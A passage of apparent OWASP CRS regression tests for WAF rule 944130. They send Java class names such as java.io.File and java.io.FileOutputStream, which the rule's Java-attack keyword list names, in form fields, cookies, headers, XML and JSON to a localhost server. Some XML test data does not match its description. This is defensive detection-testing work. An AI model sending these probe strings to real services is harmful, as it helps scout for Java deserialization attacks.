dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Content-Type application/json arg name includes keyword 
java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-68 + desc: "Argument name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML attribute value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: "Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + 
desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + 
desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + 
desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-100 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML attribute value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 